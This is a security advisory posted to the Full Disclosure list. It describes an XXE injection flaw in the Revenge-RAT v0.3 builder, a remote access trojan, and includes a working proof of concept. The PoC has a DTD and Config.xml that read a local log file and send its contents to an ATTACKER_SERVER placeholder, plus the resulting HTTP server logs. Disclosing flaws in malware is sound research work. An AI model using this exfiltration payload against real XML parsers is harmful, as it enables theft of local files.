
Date: Thu, 17 Mar 2022 13:11:18 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] BuilderRevengeRAT - (Revenge-RAT v0.3) / XML External Entity
	Injection

Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source:
https://malvuln.com/advisory/531d8b4ac8f7eb827d62424169321b2b.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: BuilderRevengeRAT - (Revenge-RAT v0.3)
Vulnerability: XML External Entity Injection
Description: The malware listens on TCP port 333. There is a Config.xml
file used by the RAT builder to specify port, notification, webcam etc. The
XML parser used by the RAT is vulnerable to XML Injection, this can allow
local file exfiltration to a remote attacker server and or Geo location
disclosure of the RAT builder.
Family: Revenge
Type: PE32
MD5: 531d8b4ac8f7eb827d62424169321b2b
Vuln ID: MVID-2022-0521
Disclosure: 03/17/2022

Exploit/PoC:
1) python -m http.server (Port 8000)

2) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER_SERVER:8000?%file;'>">
%all;

3) "Config.xml"

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE MALVULN [
<!ENTITY % file SYSTEM "C:\BuilderRevengeRAT\Revenge-RAT
v0.3\Database\2022-03-16\3-57-36 PM.log">
<!ENTITY % dtd SYSTEM "http://ATTACKER_SERVER:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

4) Run the "Revenge-RAT v0.3.exe" malware

Result...

Serving HTTP on 0.0.0.0 port 8000 ...
DESKTOP-2C3IQHO - - [16/Mar/2022 16:12:40] "GET /payload.dtd HTTP/1.1" 200 -
DESKTOP-2C3IQHO - - [16/Mar/2022 16:12:40] "GET
/?[%203:57:37%20PM%20]%20Revenge%20Started%20..%7C...%7CUnknown.png%7C[%203:57:45%20PM%20]%20Listening%20:%20333%7C...%7CUnknown.png%7C
HTTP/1.1" 301 -
DESKTOP-2C3IQHO - - [16/Mar/2022 16:12:40] "GET
/?[%203:57:37%20PM%20]%20Revenge%20Started%20..%7C...%7CUnknown.png%7C[%203:57:45%20PM%20]%20Listening%20:%20333%7C...%7CUnknown.png%7C/
HTTP/1.1" 200 -
DESKTOP-2C3IQHO - - [16/Mar/2022 16:15:14] "GET /payload.dtd HTTP/1.1" 200 -


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
